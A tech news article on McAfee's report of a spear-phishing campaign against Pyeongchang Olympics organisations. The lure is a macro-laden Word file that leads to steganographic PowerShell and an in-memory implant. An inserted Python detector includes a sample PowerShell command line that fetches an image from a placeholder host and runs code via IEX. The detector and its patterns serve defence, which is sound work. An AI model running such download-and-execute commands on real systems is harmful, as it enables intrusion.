
Stealth Malware Targets Pyeongchang Olympics Organisations

Researchers have uncovered a complex malware campaign targeting organisations involved in this winter’s Pyeongchang Olympics in South Korea – disguised, ironically, as an email from the country’s national security services.

The campaign began on 22 December, with attackers quickly adopting newly released tools to help disguise their malicious code, said computer security firm McAfee.

The malware-infected email is spoofed so that it appears to come from info@nctc.go.kr, an address used by South Korea’s National Counter-Terrorism Center (NCTC).

“The timing is interesting because the NCTC was in the process of conducting physical antiterror drills in the region in preparation for the Olympic Games,” McAfee said in an advisory. “The spoofed source of this email suggests the message is legitimate and increases the chances that victims will treat it as such.”

The malicious document with instructions to enable content. Credit: McAfee

Infected attachment

The real sender was an IP address in Singapore, McAfee said.

The email was initially sent to icehockey@pyeongchang2018.com, with a number of other South Korean organisations listed in the BCC line, most involved either in providing infrastructure or support for the Olympics.

The email included an infected attachment with a Korean-language title that translates as “Organised by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”.

The image that contains the hidden PowerShell code. Credit: McAfee

Initially the attackers used a hypertext application (HTA) file to install malware on targets’ computers, but they quickly shifted to another method that involves hiding the malicious code in an image file, a technique called steganography.

To do so they used a tool released only days earlier, demonstrating their quick adoption of new techniques, McAfee said.

The attackers’ elaborate methods are designed to bypass security software that might otherwise detect and block the malicious code being downloaded and executed on users’ systems.

Disguised scripts

Techniques such as email spoofing and the use of the Korean language help make the malicious document appear legitimate, McAfee said.

The latest malicious attachment is a Word document written in Korean that asks users to enable content. If they do so, a Visual Basic macro launches a PowerShell script that downloads an image file from a remote server.

It then reads and executes another PowerShell script hidden in the image. This second script establishes a link to a server in the Czech Republic, which gives the attackers the ability to execute commands remotely on the target’s machine.
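One way a defender could flag this macro-to-PowerShell-to-image chain in endpoint telemetry, as an added example that is not from McAfee’s advisory or this article: the process-creation events below are constructed, and the JSON field names, the host paths and the three rules are this example’s own assumptions rather than anything the researchers published.

```python
import json
import re

# Constructed sample process-creation events (Sysmon event 1 style, simplified
# to JSON lines). PIDs, paths and the URL are made up for this example.
SAMPLE_EVENTS = r'''
{"pid": 4120, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "WINWORD.EXE /n invite.docx"}
{"pid": 4388, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "command_line": "powershell.exe -NoP -W Hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/banner.png','C:\\Users\\Public\\banner.png'); IEX $script"}
{"pid": 5010, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell.exe -File C:\\scripts\\backup.ps1"}
{"pid": 5222, "image": "C:\\Windows\\System32\\notepad.exe", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "command_line": "notepad.exe"}
'''

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# mshta.exe is included so the earlier HTA variant of the lure is covered too.
SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient|\biwr\b", re.I)
IMAGE_RE = re.compile(r"\.(png|jpe?g|gif|bmp)\b", re.I)
# In-memory execution markers: Invoke-Expression / IEX or an encoded command.
INMEM_RE = re.compile(r"\bIEX\b|Invoke-Expression|-e(nc\w*)?\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rules an event matches (empty list if it is benign)."""
    reasons = []
    child, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event.get("command_line", "")
    if parent in OFFICE_APPS and child in SHELLS:
        reasons.append("office_spawned_shell")        # macro launched a script host
    if child in SHELLS and DOWNLOAD_RE.search(cmd) and IMAGE_RE.search(cmd):
        reasons.append("shell_downloads_image")       # script fetches an image file
    if child in SHELLS and INMEM_RE.search(cmd):
        reasons.append("in_memory_execution")         # nothing written as a .ps1
    return reasons


def scan(jsonl):
    """Map each suspicious PID to the rules it matched across a JSON-lines feed."""
    hits = {}
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            hits[event["pid"]] = reasons
    return hits


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
```

A single match on the first rule alone is a strong signal on its own; the other two narrow it to this particular download-and-execute pattern.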

Both scripts are heavily disguised, McAfee said.

“The attacker’s objective is to make analysis difficult and to evade detection technologies that rely on pattern matching,” the researchers wrote.

To hide the code in the image the attackers used Invoke-PSImage, an open source tool only released on 20 December.

McAfee found that the Czech server belongs to a legitimate organisation, suggesting it was hacked for use in distributing malware.

The hackers’ efforts appear to have paid off, researchers said, since a log for the Czech control server indicated that IP addresses from South Korea were connecting to the URLs contained in the malware.


In-memory implant

“This indicates that the implant was active in South Korea and targets were likely being infected,” McAfee said.

The use of in-memory PowerShell implants is an increasingly common technique: no files need to be stored on the targets’ systems, because the malware runs entirely in memory.

McAfee said it was the first time the technique had been observed targeting South Korean organisations. In the past attackers have tended to target vulnerabilities in Hangul, a popular South Korean word-processing program.

“With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes,” McAfee said. “In similar past cases, the victims were targeted for their passwords and financial information.”


Matthew Broersma

Matt Broersma is a long-standing tech freelancer who has worked for Ziff-Davis, ZDNet and other leading publications.
